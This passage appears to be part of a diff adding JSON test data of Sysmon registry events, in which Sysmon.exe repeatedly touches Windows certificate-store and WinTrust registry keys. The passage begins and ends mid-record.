"Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570862770000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570862770000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570862770000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570862770000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570862770000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570862770000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570862770000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570862770000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570862770000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570862770000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570862770000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570862770000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570862930000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570862930000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570862930000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570862930000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570862930000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570862930000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570862930000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570862930000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570862930000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570862930000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570862930000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570862930000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570862930000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570862930000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570862930000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570862930000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570862930000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570862930000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570862930000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570862930000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570862930000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570862930000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570862930000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570862930000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570862930000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570862930000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570862930000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570862930000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570862930000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570862930000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570862930000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570862930000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570862930000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570862930000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570862930000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570862930000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570862930000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570862930000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570862930000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570862930000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570862930000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570862930000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570862930000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570862930000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570862930000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570862930000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570862930000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570862930000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570862930000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570863090000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570863090000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570863090000, + "unique_pid": 